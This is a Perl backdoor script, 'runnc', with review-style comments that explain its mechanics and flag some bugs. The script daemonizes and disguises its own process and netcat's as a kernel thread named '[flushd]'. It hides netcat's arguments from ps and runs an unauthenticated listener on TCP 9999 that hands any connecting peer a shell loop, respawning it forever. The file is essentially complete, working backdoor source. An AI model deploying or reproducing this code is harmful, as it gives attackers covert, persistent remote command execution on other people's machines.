
#!/usr/bin/perl
#
# runnc - run Netcat root shell.
#
# Usage:
#     'runnc -d' to be daemon,
#     'runnc' to be Netcat helper program (pseudo shell.)

use POSIX;

# Disguise the process.  Remember how we were invoked ($ME is passed to
# nc's -e later, so the listener can re-launch this script), then overwrite
# the command name that process listings show with something that looks
# like a kernel thread.  Only the ps-style name is changed; the script file
# and its interpreter are not hidden by this.
$FAKENAME = '[flushd]';
( $ME, $0 ) = ( $0, $FAKENAME );        # RHS is evaluated before either assignment

# Helper mode.  'nc -e' starts us with an empty @ARGV; in that case act as
# a minimal shell: read one line at a time from the connection (our STDIN)
# and hand it to the system shell.  Nothing authenticates the peer --
# whoever reaches the listener gets this loop, as the process's owner.
if ( !@ARGV ) {
        $| = 1;                                 # unbuffered: prompt must reach the socket at once
        open STDERR, '>&', \*STDOUT;            # command errors travel back over the socket too
        print "Welcome to your root shell.\n";
        print "hackedbox# ";                    # cosmetic prompt
        while ( defined( my $cmd = <STDIN> ) ) {
                chomp $cmd;
                # Non-zero means the shell or the command failed.  $! is only
                # meaningful when system() itself returned -1 (could not spawn);
                # for an ordinary non-zero exit status it is stale.
                print "$!\n" if system($cmd);
                print "hackedbox# ";
        }
        exit;
}

# We're supposed to start as a daemon.
# Reached for 'runnc -d' -- or for any argument at all: the helper branch
# above only tests @ARGV for emptiness, the '-d' itself is never checked.
chdir '/';      # don't pin the invoking directory.  NOTE(review): $ME was saved
                # from $0 before this; a relative invocation path will no longer
                # resolve when nc tries to -e it after the chdir.

# redirect file descriptors
# Two-argument open is used for the three standard handles; it is tolerable
# only because every target is a fixed literal, never data.
open STDIN, '/dev/null';
open STDOUT, '>/dev/null';
open STDERR, '>&STDOUT';

# fork off and get owned by init.
# Parent exits, child continues.  NOTE(review): a failed fork returns undef,
# which is false, so the original process would fall through and carry on as
# if it were the child -- the result is not checked.
fork and exit;

# dissociate from terminal
# A failure here is invisible: STDERR already points at /dev/null.
setsid                  or die "Can't start a new session: $!";


do {
        print "Running Netcat\n";       # never seen: STDOUT was redirected to /dev/null above
        # fork and run the Netcat program (hide its process name too.)
        # open() with "|-" forks: it returns 0 in the child (so the unless
        # branch runs there) and the child's pid in the parent, whose writes
        # to NETCAT become the child's STDIN.
        unless (open NETCAT, "|-") {
                # Child: replace ourselves with nc.  The indirect-object form
                # sets argv[0] to $FAKENAME, so listings show "[flushd]" instead
                # of "nc".  The binary path is hard-coded to one user's home.
                exec { "/home/bri/bin/nc" } $FAKENAME;
                exit;   # only reached if exec failed, and nothing reports it
        } else {
                # send it the command line args in stdin to hide from ps.
                # Parent: nc was started with no arguments and is fed its
                # options on stdin instead, so the port and the -e target do
                # not appear in the process list.  This relies on the nc build
                # reading its command line from stdin when given no arguments
                # (the original Hobbit netcat does) -- verify for the nc in use.
                # With no bind address given this listens on TCP 9999 for any
                # peer, with no authentication; -e hands each connection to
                # this script ($ME -- must be an absolute path, see chdir '/').
                print NETCAT "-l -p 9999 -e $ME";
                close NETCAT;   # flushes the option line and waits for nc to exit
        }
        wait;   # wait for Netcat to complete.
                # close() above already reaped the child, so this returns at
                # once; the loop then respawns the listener immediately.
} while 1;      # keep looping forever.